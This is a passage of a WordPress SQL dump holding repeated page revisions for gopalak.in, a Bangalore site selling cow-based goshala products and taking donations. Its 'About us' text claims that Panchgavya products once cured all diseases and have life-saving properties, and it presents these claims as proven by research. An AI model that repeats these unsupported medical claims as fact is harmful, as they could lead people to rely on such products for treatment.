/></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-17 10:42:59','2022-10-17 05:12:59','',1373,'https://gopalak.in/?p=1810',0,'revision','',0),(1811,1,'2022-10-17 10:42:59','2022-10-17 05:12:59','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-17 10:42:59','2022-10-17 05:12:59','',1373,'https://gopalak.in/?p=1811',0,'revision','',0),(1812,1,'2022-10-17 10:42:59','2022-10-17 05:12:59','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-17 10:42:59','2022-10-17 05:12:59','',1373,'https://gopalak.in/?p=1812',0,'revision','',0),(1813,1,'2022-10-17 10:43:32','2022-10-17 05:13:32','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-17 10:43:32','2022-10-17 05:13:32','',1804,'https://gopalak.in/?p=1813',0,'revision','',0),(1814,1,'2022-10-17 10:43:32','2022-10-17 05:13:32','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Elementor #1804','','inherit','closed','closed','','1804-revision-v1','','','2022-10-17 10:43:32','2022-10-17 05:13:32','',1804,'https://gopalak.in/?p=1814',0,'revision','',0),(1815,1,'2022-10-17 10:43:32','2022-10-17 05:13:32','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Elementor #1804','','inherit','closed','closed','','1804-revision-v1','','','2022-10-17 10:43:32','2022-10-17 05:13:32','',1804,'https://gopalak.in/?p=1815',0,'revision','',0),(1816,1,'2022-10-17 10:52:59','2022-10-17 05:22:59','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, 